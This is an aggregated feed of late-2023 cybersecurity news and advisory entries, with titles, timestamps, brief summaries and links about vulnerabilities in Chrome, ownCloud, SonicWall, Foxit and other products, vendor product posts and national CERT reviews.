2023-12-07T00:00:00Z | 1701907200

The new Vectra AI Platform Syslog Connector collects all threat events and sends them directly to any syslog server.

https://www.vectra.ai/blog/vectra-ai-platform-syslog-connector-integrated-signal-to-any-siem
Using GreyNoise EAP Sensors For Novel Exploitation Discovery For CVE-2023-47246
2023-12-07T00:00:00Z | 1701907200

GreyNoise researcher Jacob Fisher discusses the importance of reactive honeypots/sensors for accurate and comprehensive packet captures, along with his methodology for exploring real-world service exploitation.

https://www.greynoise.io/blog/using-greynoise-eap-sensors-for-novel-exploitation-discovery-for-cve-2023-47246
Monolith Versus Microservices: Weigh the Pros and Cons of Both Configs
2023-12-06T14:00:00Z | 1701871200

https://www.akamai.com/blog/cloud/2023/dec/monolith-versus-microservices-weigh-the-difference
Publishing Trail of Bits’ CodeQL queries
2023-12-06T13:30:25Z | 1701869425

We are publishing a set of custom CodeQL queries for Go and C. We have used them to find critical issues that the standard CodeQL queries would have missed. This new release of a continuously updated repository of CodeQL queries joins our public Semgrep rules and Automated Testing Handbook in an effort […]

https://blog.trailofbits.com/2023/12/06/publishing-trail-of-bits-codeql-queries/
Actively Exploited Vulnerability in FXC Routers: Fixed, Patches Available
2023-12-06T06:00:00Z | 1701842400

https://www.akamai.com/blog/security-research/2023/dec/zero-day-vulnerability-spreading-mirai-patched
Security Alert (A23-12-03): Multiple Vulnerabilities in Google Chrome
2023-12-06T04:00:00Z | 1701835200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-04): Vulnerability in Cisco Products
2023-12-06T04:00:00Z | 1701835200

Cisco released a security advisory to address a vulnerability in Cisco software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Advisory - Identity Bypass Vulnerability in Some Huawei Smart Screen Products
2023-12-06T00:00:00Z | 1701820800

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-ibvishssp-4bf951d4-en
Blind CSS Exfiltration: exfiltrate unknown web pages
2023-12-05T15:37:20Z | 1701790640

This is a gif of the exfiltration process (We've increased the speed so you're not waiting around for 1 minute). Read on to discover how this works... CSS Cafe presentation I presented this technique

https://portswigger.net/research/blind-css-exfiltration
QR Code Scams: Unveiling Hidden Threats
2023-12-05T11:33:00Z | 1701775980

Imagine receiving a QR code in your inbox, appearing harmless at first glance. Yet, these codes can be more than simple links—they might be qishing traps, designed to sneakily capture your personal information. In this context, Joe Security emerges as a crucial ally, offering advanced capabilities to identify and neutralize these hidden cyber threats. Our fully automated and in-depth analysis transforms how we approach QR Code phishing, or 'qishing'.Exposing Deceptive QR Codes with Joe SandboxEncountering a standard QR code offered us the chance to showcase Joe Sandbox's abilities. Our goal was to investigate the code and reveal its true nature. In the world of qishing, where threats are cleverly hidden, our mission was to reveal the trickery. With Joe Sandbox, we simply drag and drop the QR Code image onto our web platform, initiating the analysis.The Investigation: Joe Sandbox's Insightful AnalysisJoe Sandbox tackled this challenge with its distinguishing feature efficiency and automation. Within minutes, we had a comprehensive analysis report. Joe Sandbox automatically detected the QR code in a standard Windows image viewer and upon analysis, it revealed a path to a phishing website. The website displayed a Microsoft logo, but its URL, unaffiliated with Microsoft, and the favicon also falsely sporting a Microsoft logo, were clear indicators of a phishing attempt.Technical Analysis: Dissecting the Qishing MechanismOur in-depth report from Joe Sandbox highlighted several key findings:Sample Name: MFA.png (Our QR Code Image)Detection Confidence: 100%Threat Identification: HTMLPhisherKey Insights:Favicon Inconsistency: A deceptive URL hiding under Microsoft's visual identity.HtmlPhish54 Alert: The underlying HTML mechanisms designed to mislead.Logo Misuse: The strategic exploitation of Microsoft's logo for malicious purposes.Qishing Attempts Uncovered with EaseJoe Sandbox's detailed analysis not only identified the threat but also dissected the qishing tactics employed. This case study exemplifies Joe Sandbox's ability to navigate the complexities of cyber threats, providing concrete, actionable insights. Our analysis depth is industry-leading. View our full report:https://www.joesandbox.com/analysis/1297427/0/htmlJoe Security - Deep Malware AnalysisFrom the deceptive simplicity of a QR code to the profound capabilities of Joe Sandbox, we explore how to identify and combat complex qishing operations. In the dynamic world of cybersecurity, Joe Sandbox is a reliable guardian, safeguarding digital integrity against ever-evolving cyber threats.Interested in testing Joe Sandbox? Register for free at Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/39200463567687582
The National Cyber Security Centre Finland’s weekly review – 48/2023
2023-12-05T10:30:28Z | 1701772228

Criminals are now targeting companies’ and associations’ Facebook accounts. The attacks involve messages sent via Messenger claiming that the user’s account will be closed due to a copyright infringement, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-482023
The National Cyber Security Centre Finland’s weekly review – 48/2023
2023-12-05T10:30:28Z | 1701772228

Criminals are now targeting companies’ and associations’ Facebook accounts. The attacks involve messages sent via Messenger claiming that the user’s account will be closed due to a copyright infringement, for example.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-482023
Security Alert (A23-12-01): Multiple Vulnerabilities in Android
2023-12-05T04:00:00Z | 1701748800

Google has released Android Security Bulletin December 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-12-02): Multiple Vulnerabilities in SonicWall SMA 100 Series Products
2023-12-05T04:00:00Z | 1701748800

SonicWall has released a security advisory to address multiple vulnerabilities in SMA 100 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Buildroot package hash checking data integrity vulnerabilities
2023-12-05T00:00:00Z | 1701734400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1844
Buildroot BR_NO_CHECK_HASH_FOR data integrity vulnerability
2023-12-05T00:00:00Z | 1701734400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1845
GPSd NTRIP Stream Parsing access violation vulnerability
2023-12-05T00:00:00Z | 1701734400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1860
Open call - DIGITAL-2023-SKILLS-05: Advanced Digital Skills
2023-12-05T00:00:00Z | 1701734400

Está a decorrer entre 21 de novembro de 2023 e 21 de março de 2024, a call para submissão de propostas no âmbito da 'DIGITAL-2023-SKILLS-05: Advanced Digital Skills', ao abrigo do Programa Europa Digital, que inclui a Cybersecurity Skills Academy. A call destina-se a consórcios de Instituições de ensino superior, de ensino e formação profissional, da administração pública, unidades de investigação, empresas e centros nacionais de competências em cibersegurança.  A Cybersecurity Skills Academy vai ser implementada pela Comissão Europeia, pelo Centro Europeu de Competências em Cibersegurança (ECCC) e pela Agência da União Europeia para a Cibersegurança (ENISA). A Academia está alojada na plataforma Digital Skills and Jobs Platform, na qual estão disponíveis todas as informações relevantes para os europeus interessados numa carreira em cibersegurança. Saiba mais sobre a Cybersecurity Skills Academy  No dia 12 de dezembro vai decorrer uma Sessão de Esclarecimento da Comissão Europeia no âmbito do DIGITAL Europe Programme, que inclui a Cybersecurity Skills Academy.  É uma instituição de ensino superior, um centro de investigação e excelência ou uma empresa inovadora que desenvolve tecnologias digitais?  Participe no Info Day para saber mais sobre sobre a submissão de propostas e esclareça as dúvidas nas sessões de perguntas e respostas.  Saiba mais sobre a Sessão de Esclarecimento   Sobre a Cybersecurity Skills Academy A Cybersecurity Skills Academy é uma estrutura europeia que visa concentrar e coordenar ofertas de formação em cibersegurança, certificações, oportunidades de financiamento e outras iniciativas destinadas a promover competências em cibersegurança. Visa reunir iniciativas públicas e privadas destinadas a promover as competências em cibersegurança a nível europeu e nacional. A Comissão Europeia pretende, desta forma, garantir uma abordagem coordenada para colmatar a falta de talentos em cibersegurança. 

https://dyn.cncs.gov.pt/pt/detalhe/art/135812/open-call-digital-2023-skills-05-advanced-digital-skills
CVE-2023-49105, WebDAV Api Authentication Bypass in ownCloud
2023-12-05T00:00:00Z | 1701734400

While the 10/10 CVE-2023-49103 got all the attention last week, organizations should not quickly overlook CVE-2023-49105!

https://www.greynoise.io/blog/cve-2023-49105-webdav-api-authentication-bypass-in-owncloud
CVE-2022-28958: Remote Code Execution Vulnerability in D-Link REJECTED
2023-12-05T00:00:00Z | 1701734400

Through further investigation into CVE-2022-28958 revealed that the vulnerability did not actually exist. This case serves as a reminder of the importance of thorough and rigorous vulnerability verification.

https://www.greynoise.io/blog/cve-2022-28958-remote-code-execution-vulnerability-dlink-rejected
Suhtluskeskkonda vestlus.eesti.ee saab kasutada veel kuni 18.12.2023
2023-12-04T17:56:37Z | 1701712597

Koroonakriisi ajal loodud suhtluskeskkond vestlus.eesti.ee läheb muutunud nõudluse ja litsentsitingimuste tõttu alates 18.12.2023 sulgemisele.

https://ria.ee/uudised/suhtluskeskkonda-vestluseestiee-saab-kasutada-veel-kuni-18122023
SonicWall SSL-VPN SMA100 Version 10.x Is Affected By Multiple Vulnerabilities
2023-12-04T15:17:50Z | 1701703070

1) CVE-2023-44221 - Post Authentication OS Command Injection VulnerabilityImproper neutralization of special elements in the SMA100 SSL-VPN management interface allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as a 'nobody' user, potentially leading to OS Command Injection Vulnerability. CVSS Score: 7.2 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') IMPACT: As outlined in SNWLID-2023-0018, successfully leveraging CVE-2023-44221 against impacted SMA 100 devices can result in the post-authenticated remote attacker with administrative privilege being able to inject arbitrary commands which can potentially lead to OS command execution on the appliance. 2) CVE-2023-5970 - Post Authentication External User MFA Bypass VulnerabilityImproper authentication in the SMA100 SSL-VPN virtual office portal allows a remote authenticated attacker to create an identical external domain user, resulting in an MFA bypass.CVSS Score: 6.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CWE-287: Improper Authentication IMPACT: As outlined in SNWLID-2023-0018, successfully leveraging CVE-2023-5970 against impacted SMA 100 devices can result in the post-authenticated remote attacker being able to bypass the SMA100 MFA feature which can potentially lead to access to the globally defined SSL-VPN portal bookmarks and resources in the appliance.SonicWall strongly advises SMA 100 series product users, which include SMA 200, 210, 400, 410, and 500v products to upgrade to the mentioned fixed release version. CVE: CVE-2023-44221, CVE-2023-5970 Last updated: April 29, 2025, 12:51 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0018
Healthcare Trends in 2024: Challenges and Opportunities
2023-12-04T14:00:00Z | 1701698400

https://www.akamai.com/blog/security/2023/dec/healthcare-trends-in-2024-challenges-and-opportunities
Akamai Account Protector?s New Protection Against Account Opening Abuse
2023-12-04T14:00:00Z | 1701698400

https://www.akamai.com/blog/security/2023/nov/akamai-account-protector-abuse-protection-solution
What is XDR? The Promise of XDR Capabilities Explained by Mark Wojtasiak
2023-12-04T00:00:00Z | 1701648000

Innovative XDR capabilities can deliver the ML/AI capabilities your security team needs to outpace expanding AI-enhanced threats.

https://www.vectra.ai/blog/what-is-xdr-the-promise-of-xdr-capabilities-explained
Noname Security Platform Updates: November 2023
2023-12-02T01:21:00Z | 1701480060

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-november-2023
What Is Distributed Cloud and Why Should You Care?
2023-12-01T16:16:00Z | 1701447360

https://www.akamai.com/blog/cloud/2023/nov/what-is-distributed-cloud-why-should-you-care
Kaitseväekohustuse täitma asumine lihtsustub
2023-12-01T12:22:45Z | 1701433365

Tulevastele ajateenijatele koondatakse kogu vajalik info kaitseväekohustuse täitmiseks riigiportaali eesti.ee, muutes suhtluse riigiga kiiremaks, lihtsamaks ja mugavamaks.

https://ria.ee/uudised/kaitsevaekohustuse-taitma-asumine-lihtsustub
High Threat Security Alert (A23-11-22): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-12-01T04:00:00Z | 1701403200

Apple has released iOS 17.1.2 and iPadOS 17.1.2 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Amsterdamis koguneti digikukru kasutusjuhtude arenguid arutama
2023-11-30T14:13:59Z | 1701353639

28. ja 29. novembril kogunesid Amsterdamis 19 ELi liikmesriigi ja Ukraina eksperdid, et liikuda samm lähemale Euroopa digikukru loomisele.

https://ria.ee/uudised/amsterdamis-koguneti-digikukru-kasutusjuhtude-arenguid-arutama
High Threat Security Alert (A23-11-21): Multiple Vulnerabilities in Microsoft Edge
2023-11-30T04:00:00Z | 1701316800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
2024 Predictions: Generative AI’s Role in Cybersecurity   by Vectra AI Security Research team
2023-11-30T00:00:00Z | 1701302400

The escalating influence of generative AI on business and cybersecurity in 2024: its growing adoption, potential challenges, and the critical need for regulatory oversight.

https://www.vectra.ai/blog/2024-predictions-generative-ais-role-in-cybersecurity
The National Cyber Security Centre Finland’s weekly review – 47/2023
2023-11-29T07:24:11Z | 1701242651

This week, our topics include currently circulating Signal and Telegram scam messages and an active phishing campaign involving scammers impersonating Kela.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-472023
The National Cyber Security Centre Finland’s weekly review – 47/2023
2023-11-29T07:24:11Z | 1701242651

This week, our topics include currently circulating Signal and Telegram scam messages and an active phishing campaign involving scammers impersonating Kela.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-472023
October's cyber weather was stormy on many fronts
2023-11-29T07:04:42Z | 1701241482

October's cyber weather was stormy. In particular, the storminess is explained by the serious alert 1/2023 published in October, which warned of a wave of Microsoft 365 phishing and data breaches, which spawned hundreds of notifications of email account breaches in Finland. In addition, several critical vulnerabilities were published in October, many of which had already been exploited.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2023
October's cyber weather was stormy on many fronts
2023-11-29T07:04:42Z | 1701241482

October's cyber weather was stormy. In particular, the storminess is explained by the serious alert 1/2023 published in October, which warned of a wave of Microsoft 365 phishing and data breaches, which spawned hundreds of notifications of email account breaches in Finland. In addition, several critical vulnerabilities were published in October, many of which had already been exploited.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_10/2023
High Threat Security Alert (A23-11-19): Multiple Vulnerabilities in Google Chrome
2023-11-29T04:00:00Z | 1701230400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-20): Vulnerability in Apache Tomcat
2023-11-29T04:00:00Z | 1701230400

The Apache Software Foundation released a security update to address a vulnerability in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-49103: ownCloud Critical Vulnerability Quickly Exploited in the Wild
2023-11-29T00:00:00Z | 1701216000

File server and collaboration platform ownCloud publicly disclosed a critical vulnerability with a CVSS severity rating of 10 out of 10. This vulnerability, tracked as CVE-2023-49103, affects the "graphapi" app used in ownCloud.

https://www.greynoise.io/blog/cve-2023-49103-owncloud-critical-vulnerability-quickly-exploited-in-the-wild
Cisco Doubles Down on Network Assurance with AWS
2023-11-28T16:00:00Z | 1701187200

New integration between Cisco ThousandEyes and Amazon CloudWatch Internet Monitor (CWIM).More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m11/cisco-doubles-down-on-network-assurance-with-aws.html
Say Goodbye to Monolithic EdgeWorkers: Introducing Flexible Composition (Part 1)
2023-11-28T14:00:00Z | 1701180000

https://www.akamai.com/blog/edge/2023/nov/say-goodbye-to-monolithic-edgeworkers-introducing-flexible-composition-part-1
Event Opportunities in 2024 & Last Call for FIRSTCON24 Speakers
2023-11-28T00:00:00Z | 1701129600

Are you interested in getting involved in FIRST’s 2024 events? If so, take special note of the details and dates below. This digest covers… FIRSTCON24 Call for Speakers and Trainings Closing This Month 2024 Events Speaking and Sponsorship Opportunities 2024 Events Save the Date Information

https://www.first.org/newsroom/announce/20231128
Elevating Threat Intelligence with GreyNoise and Microsoft Sentinel
2023-11-28T00:00:00Z | 1701129600

Learn more about our new integration for Microsoft Sentinel that enhances threat intelligence capabilities for business security.

https://www.greynoise.io/blog/elevating-threat-intelligence-with-greynoise-and-microsoft-sentinel
Security and simplicity, in a multicloud world
2023-11-27T13:00:00Z | 1701090000

Cisco’s Multicloud Defense: seamless solutions to protect apps in complex, hybrid-cloud environments. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m11/security-and-simplicity-in-a-multicloud-world.html
The Dark Side of AI: Large-Scale Scam Campaigns Made Possible by Generative AI
2023-11-27T11:30:18Z | 1701084618

Generative artificial intelligence technologies such as OpenAI’s ChatGPT and DALL-E have created a great deal of disruption across much of our digital lives. Creating credible text, images and even audio, these AI tools can be used for both good and ill. That includes their application in the cybersecurity space. While Sophos AI has been working […]

https://news.sophos.com/en-us/2023/11/27/the-dark-side-of-ai-large-scale-scam-campaigns-made-possible-by-generative-ai/
High Threat Security Alert (A23-11-18): Multiple Vulnerabilities in ownCloud
2023-11-27T04:00:00Z | 1701057600

ownCloud released the security advisories to address multiple vulnerabilities in ownCloud core, graphapi and oauth2 libraries.

https://www.govcert.gov.hk/en/alerts_detail.php
Foxit Reader Javascript exportDataObject HTA file creation vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1834
Foxit Reader 3D Annot use-after-free vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1837
Foxit Reader field value property type confusion vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1838
Foxit Reader Javascript exportDataObject arbitrary file creation vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1833
WPS Office ET Data use of uninitialized pointer vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1748
Foxit Reader signature field OnBlur event use-after-free vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1839
Foxit Reader Javascript saveAs arbitrary file creation vulnerability
2023-11-27T00:00:00Z | 1701043200

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1832
XDR Explored: The Evolution and Impact of Extended Detection and Response by Tim Wade
2023-11-27T00:00:00Z | 1701043200

Buyers should be aware that there are really four primary spaces that XDR vendors are coming from.

https://www.vectra.ai/blog/xdr-explored-the-evolution-and-impact-of-extended-detection-and-response
UK and US develop new global guidelines for AI security
2023-11-26T18:28:13Z | 1701023293

New guidelines for secure AI system development will help developers of any systems that use AI make informed cyber security decisions at every stage of the development process.

https://www.ncsc.gov.uk/news/uk-develops-new-global-guidelines-ai-security
UK and Republic of Korea issue warning about DPRK state-linked cyber actors attacking software supply chains
2023-11-23T16:09:04Z | 1700755744

Joint advisory observes cyber actors leveraging zero-day vulnerabilities and exploits in third-party software.

https://www.ncsc.gov.uk/news/uk-republic-of-korea-issue-warning-dprk-state-linked-cyber-actors-attacking-software-supply-chains
Cato Application Catalog – How we supercharged application categorization with AI/ML
2023-11-23T09:49:51Z | 1700732991

New applications emerge at an almost impossible to keep-up-with pace, creating a constant challenge and blind spot for IT and security teams in the form of Shadow IT. Organizations must keep up by using tools that are automatically updated with latest developments and changes in the applications landscape to maintain proper security. An integral part... The post Cato Application Catalog – How we supercharged application categorization with AI/ML appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-application-catalog-how-we-supercharged-application-categorization-with-ai-ml/
The National Cyber Security Centre Finland’s weekly review – 46/2023
2023-11-23T08:19:58Z | 1700727598

This week, we provide information on the latest ransomware trends and the ransomware situation in Finland. We also remind our readers about the misconfiguration issue in the popular ServiceNow platform.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-462023
The National Cyber Security Centre Finland’s weekly review – 46/2023
2023-11-23T08:19:58Z | 1700727598

This week, we provide information on the latest ransomware trends and the ransomware situation in Finland. We also remind our readers about the misconfiguration issue in the popular ServiceNow platform.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-462023
Feedback from CISOs: The First Three Things to do When Starting to Use Cato
2023-11-23T08:02:22Z | 1700726542

The post Feedback from CISOs: The First Three Things to do When Starting to Use Cato appeared first on Cato Networks.

https://www.catonetworks.com/resources/feedback-from-cisos-the-first-three-things-to-do-when-starting-to-use-cato/
Security Alert (A23-11-17): Multiple Vulnerabilities in Firefox
2023-11-23T04:00:00Z | 1700712000

Mozilla has published the advisories (MFSA2023-49 and MFSA2023-50) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
The rising tide of vulnerabilities…might be more predictable than you think.
2023-11-22T18:00:00Z | 1700676000

Over two days in late September, attack surface management teams, incident responders, data scientists, and vulnerability management practitioners gathered in Cardiff, Wales.

https://www.first.org/blog/20231121-The-rising-tide-of-vulnerabilities
The rising tide of vulnerabilities…might be more predictable than you think.
2023-11-22T18:00:00Z | 1700676000

Over two days in late September, attack surface management teams, incident responders, data scientists, and vulnerability management practitioners gathered in Cardiff, Wales.

https://www.first.org/blog/20231121-The-rising-tide-of-vulnerabilities
Defeat Web Shell WSO-NG
2023-11-22T15:00:00Z | 1700665200

https://www.akamai.com/blog/security-research/2023/nov/defeating-webshells-wso-ng
ETW internals for security research and forensics
2023-11-22T12:00:12Z | 1700654412

Why has Event Tracing for Windows (ETW) become so pivotal for endpoint detection and response (EDR) solutions in Windows 10 and 11? The answer lies in the value of the intelligence it provides to security tools through secure ETW channels, which are now also a target for offensive researchers looking to bypass […]

https://blog.trailofbits.com/2023/11/22/etw-internals-for-security-research-and-forensics/
Cato SASE Cloud Tops Frost Radar Innovation Index
2023-11-21T13:00:00Z | 1700571600

The post Cato SASE Cloud Tops Frost Radar Innovation Index appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sase-cloud-tops-frost-radar-innovation-index/
InfectedSlurs Botnet Spreads Mirai via Zero-Days
2023-11-21T10:00:00Z | 1700560800

https://www.akamai.com/blog/security-research/2023/nov/new-rce-botnet-spreads-mirai-via-zero-days
How CISA can improve OSS security
2023-11-20T14:35:59Z | 1700490959

The US government recently issued a request for information (RFI) about open-source software (OSS) security. In this blog post, we will present a summary of our response and proposed solutions. Some of our solutions include rewriting widely used legacy code in memory safe languages such as Rust, funding OSS solutions to improve […]

https://blog.trailofbits.com/2023/11/20/how-cisa-can-improve-oss-security/
Akamai EdgeWorkers and Uniform: Personalize Web Pages at Scale Without Flicker
2023-11-20T14:00:00Z | 1700488800

https://www.akamai.com/blog/edge/2023/nov/akamai-edgeworkers-uniform-personalize-web-pages-at-scale-without-flicker
New actors and methods of operation in ransomware
2023-11-20T12:21:47Z | 1700482907

During the past year, various ransomwares have spread faster and faster around the world. The variations of ransomware and the number of actors have also increased.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kiristyshaittaohjelmissa-uusia-toimijoita
New actors and methods of operation in ransomware
2023-11-20T12:21:47Z | 1700482907

During the past year, various ransomwares have spread faster and faster around the world. The variations of ransomware and the number of actors have also increased.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kiristyshaittaohjelmissa-uusia-toimijoita
CVE-2023-40151
2023-11-20T11:00:00Z | 1700478000

CWE-749 Exposed Dangerous Method or Function When user authentication is not enabled the shell can execute commands with the highest privileges. Red Lion SixTRAK and VersaTRAK Series RTUs with authenticated users enabled (UDR-A) any Sixnet UDR message will meet an authentication challenge over UDP/IP. When the same message comes over TCP/IP the RTU will simply accept the message with no authentication challenge.

https://claroty.com/team82/disclosure-dashboard/cve-2023-40151
CVE-2023-42770
2023-11-20T10:59:00Z | 1700477940

CWE-288: Authentication Bypass Using an Alternative Path or Channel Red Lion SixTRAK and VersaTRAK Series RTUs with authenticated users enabled (UDR-A) any Sixnet UDR message will meet an authentication challenge over UDP/IP. When the same message is received over TCP/IP the RTU will simply accept the message with no authentication challenge.

https://claroty.com/team82/disclosure-dashboard/cve-2023-42770
What Do Customers Want from XDR? Spoiler alert – it's not tech by Hitesh Sheth
2023-11-20T00:00:00Z | 1700438400

What does extended detection and response (XDR) security mean?

https://www.vectra.ai/blog/what-do-customers-want-from-xdr-spoiler-alert-its-not-tech
HUMINT: Diving Deep into the Dark Web
2023-11-19T08:27:36Z | 1700382456

The post HUMINT: Diving Deep into the Dark Web appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-diving-deep-into-the-dark-web
Improve User Experience with Parallel Execution of HTTP/2 Multiplexed Requests
2023-11-17T14:00:00Z | 1700229600

https://www.akamai.com/blog/performance/2023/nov/improve-ux-with-http2-multiplexed-requests
Security Alert (A23-11-16): Multiple Vulnerabilities in Microsoft Edge
2023-11-17T04:00:00Z | 1700193600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
How Signal Clarity Changes Everything for Hybrid Enterprise Defense by Mark Wojtasiak
2023-11-17T00:00:00Z | 1700179200

The security landscape is plagued by tools that cause more inefficiencies, more ineffectiveness, and more breaches than ever.

https://www.vectra.ai/blog/how-signal-clarity-changes-everything-for-hybrid-enterprise-defense
Akamai?s Perspective on November?s Patch Tuesday 2023
2023-11-16T15:00:00Z | 1700146800

https://www.akamai.com/blog/security-research/2023/nov/akamai-perspective-patch-tuesday-november-2023
SS8 Networks Announces Key Executive Hire
2023-11-16T14:00:22Z | 1700143222

New Senior Vice President of Global Sales Jeff Jones to Lead SS8’s Strategic Growth MILPITAS, Calif. – November 16, 2023 – SS8 Networks, a leader in Lawful and Location Intelligence and Monitoring suite platforms, today announced Jeff Jones as Senior Vice President of Global Sales. Jones has a comprehensive background in growth sales and go-to-market […] The post SS8 Networks Announces Key Executive Hire appeared first on SS8.

https://www.ss8.com/ss8-announces-key-executive-hire/
What Else Can You Do to Defend Against Bots?
2023-11-16T14:00:00Z | 1700143200

https://www.akamai.com/blog/developers/2023/nov/what-else-can-you-do-to-defend-against-bots
From Shadow to Guardian: The Journey of a Hacker-Turned Hero
2023-11-16T10:42:15Z | 1700131335

In the ever-evolving landscape of cybersecurity, the line between the defenders and attackers often blurs, with skills transferable across both arenas. It’s a narrative not unfamiliar to many in the cybersecurity community: the journey from black hat to white hat, from outlaw to protector.   In the 15th episode of Cato Networks’ Cyber Security Master Class,... The post From Shadow to Guardian: The Journey of a Hacker-Turned Hero  appeared first on Cato Networks.

https://www.catonetworks.com/blog/from-shadow-to-guardian-the-journey-of-a-hacker-turned-hero/
Security Alert (A23-11-13): Multiple Vulnerabilities in Cisco Products
2023-11-16T04:00:00Z | 1700107200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-14): Multiple Vulnerabilities in Fortinet Products
2023-11-16T04:00:00Z | 1700107200

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-15): Vulnerability in Intel Products
2023-11-16T04:00:00Z | 1700107200

Intel has issued a security advisory (INTEL-SA-00950) to address a vulnerability in some Intel processors.

https://www.govcert.gov.hk/en/alerts_detail.php
Getting A Leg Up On Initial Access Ransomware With CISA KEV and GreyNoise Tags
2023-11-16T00:00:00Z | 1700092800

The Cybersecurity and Infrastructure Security Agency (CISA) has added a field to their Known Exploited Vulnerabilities (KEV) catalog that denotes if a KEV CVE has been used in ransomware attacks. 35% of those have a corresponding GreyNoise tag. See how together CISA and GreyNoise can help you stay even further ahead of our combined adversaries

https://www.greynoise.io/blog/getting-a-leg-up-on-initial-access-ransomware-with-cisa-kev-and-greynoise-tags
Assessing the security posture of a widely used vision model: YOLOv7
2023-11-15T15:15:05Z | 1700061305

TL;DR: We identified 11 security vulnerabilities in YOLOv7, a popular computer vision framework, that could enable attacks including remote code execution (RCE), denial of service, and model differentials (where an attacker can trigger a model to perform differently in different contexts). Open-source software […]

https://blog.trailofbits.com/2023/11/15/assessing-the-security-posture-of-a-widely-used-vision-model-yolov7/
What Does XDR Have to Do with API Security?
2023-11-15T14:00:00Z | 1700056800

https://www.akamai.com/blog/security/2023/nov/what-does-xdr-have-to-do-with-api-security
API Security in a Zero Trust World
2023-11-15T14:00:00Z | 1700056800

https://www.akamai.com/blog/security/2023/nov/api-security-in-a-zero-trust-world
Beyond Vulnerabilities: Why API Abuse Is a Critical Challenge
2023-11-15T14:00:00Z | 1700056800

https://www.akamai.com/blog/security/2023/nov/beyond-vulnerabilities-why-api-abuse-is-a-critical-challenge
REST API Security Best Practices
2023-11-15T14:00:00Z | 1700056800

https://www.akamai.com/blog/security/2023/nov/rest-api-security-best-practices
High Threat Security Alert (A23-11-10): Multiple Vulnerabilities in Microsoft Products (November 2023)
2023-11-15T04:00:00Z | 1700020800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-11): Multiple Vulnerabilities in Google Chrome
2023-11-15T04:00:00Z | 1700020800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-11-12): Multiple Vulnerabilities in Adobe Reader/Acrobat
2023-11-15T04:00:00Z | 1700020800

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader U3D page event use-after-free vulnerability
2023-11-15T00:00:00Z | 1700006400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1842
Adobe Acrobat Reader Thermometer use-after-free vulnerability
2023-11-15T00:00:00Z | 1700006400

